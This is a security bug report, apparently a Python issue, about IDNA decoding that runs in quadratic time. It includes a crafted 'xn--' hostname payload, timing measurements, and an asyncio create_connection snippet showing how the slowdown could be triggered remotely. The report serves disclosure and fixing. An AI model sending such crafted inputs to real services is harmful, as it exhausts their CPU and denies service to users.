Originally reported to the security address on September 9.
('xn--016c'+'a'*5000).encode('utf-8').decode('idna')
The execution time is not linear in relation to the input string size, which can cause slowness with large inputs:
10 chars = 0.016 seconds
100 chars = 0.047 seconds
1000 chars = 2.883 seconds
2500 chars = 17.724 seconds
5000 chars = 1 min 10 seconds
Comment by @tiran:
According to spec https://unicode.org/reports/tr46/ an IDNA label must not be longer than 63 characters. Python's idna module enforces the restriction, but too late.
This may be abused in some cases, for example by passing a crafted host name to asyncio create_connection
:
import asyncio async def main(): loop = asyncio.get_running_loop() await loop.create_connection( lambda: [], ('xn--016c'+'a'*5000).encode('utf-8'), 443 ) asyncio.run(main())Your environment
RetroSearch is an open source project built by @garambo | Open a GitHub Issue
Search and Browse the WWW like it's 1997 | Search results from DuckDuckGo
HTML:
3.2
| Encoding:
UTF-8
| Version:
0.7.4